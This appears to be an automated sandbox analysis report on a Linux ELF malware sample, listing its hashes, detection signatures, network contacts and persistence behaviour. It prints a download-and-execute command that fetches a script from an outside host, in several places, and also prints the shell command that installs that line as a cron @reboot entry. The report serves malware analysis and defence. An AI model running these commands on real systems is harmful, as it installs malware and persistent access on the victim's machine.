Linux Analysis Report
nsharm7.elf

Overview

General Information

Sample name: nsharm7.elf
Analysis ID: 1542859
MD5: ca210ee9b185a078d977e3f9f421e2da
SHA1: 99a8fdf8489095caf3ba316f5f75561400bb64d5
SHA256: d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: nsharm7.elf ReversingLabs: Detection: 23%
Found strings indicative of a multi-platform dropper
Source: .bashrc.12.dr String: cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: bot.conf.12.dr String: exec cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: tmp.QYPaEb.18.dr String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.15:46308 -> 88.151.195.22:8623
Source: global traffic TCP traffic: 192.168.2.15:51746 -> 81.29.149.178:19313
Source: global traffic TCP traffic: 192.168.2.15:44828 -> 193.233.193.45:20610
Source: global traffic TCP traffic: 192.168.2.15:45492 -> 91.149.218.232:11299
Sample listens on a socket
Source: /tmp/nsharm7.elf (PID: 5549) Socket: 127.0.0.1:1172 Jump to behavior
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknown UDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknown UDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknown UDP traffic detected without corresponding DNS query: 65.21.1.106
Source: global traffic DNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.QYPaEb.18.dr String found in binary or memory: http://hailcocks.ru/wget.sh;
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal60.troj.linELF@0/3@8/0

Persistence and Installation Behavior
barindex
Executes the "crontab" command typically for achieving persistence
Source: /bin/sh (PID: 5555) Crontab executable: /usr/bin/crontab -> crontab -l Jump to behavior
Source: /bin/sh (PID: 5554) Crontab executable: /usr/bin/crontab -> crontab - Jump to behavior
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Source: /tmp/nsharm7.elf (PID: 5549) File written: /root/.bashrc Jump to behavior
Sample tries to persist itself using cron
Source: /usr/bin/crontab (PID: 5554) File: /var/spool/cron/crontabs/tmp.QYPaEb Jump to behavior
Source: /usr/bin/crontab (PID: 5554) File: /var/spool/cron/crontabs/root Jump to behavior
Creates hidden files and/or directories
Source: /tmp/nsharm7.elf (PID: 5549) File: /root/.bashrc Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/nsharm7.elf (PID: 5551) Shell command executed: /bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" Jump to behavior
Source: /tmp/nsharm7.elf (PID: 5556) Shell command executed: /bin/sh -c "/sbin/initctl start bot" Jump to behavior
Source: submitted sample Stderr: no crontab for root/bin/sh: 1: /sbin/initctl: not found: exit code = 0
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/nsharm7.elf (PID: 5549) Queries kernel information via 'uname': Jump to behavior
Source: nsharm7.elf, 5549.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5559.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5601.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: nsharm7.elf, 5549.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5559.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5601.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp Binary or memory string: Rx86_64/usr/bin/qemu-arm/tmp/nsharm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nsharm7.elf
Source: nsharm7.elf, 5549.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5559.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp, nsharm7.elf, 5601.1.000055d0e39c3000.000055d0e3b3a000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: nsharm7.elf, 5549.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5559.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp, nsharm7.elf, 5601.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: nsharm7.elf, 5601.1.00007ffd4acc1000.00007ffd4ace2000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
88.151.195.22
 unknown Azerbaijan
15723 AZERONLINEAZ false
193.233.193.45
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
81.29.149.178
 kingstonwikkerink.dyn Switzerland
39616 COMUNICA_IT_SERVICESCH false
91.149.218.232
 unknown Poland
198401 GECKONET-ASPL false

Contacted Domains

Name IP Active
daisy.ubuntu.com 162.213.35.24 true
kingstonwikkerink.dyn 81.29.149.178 true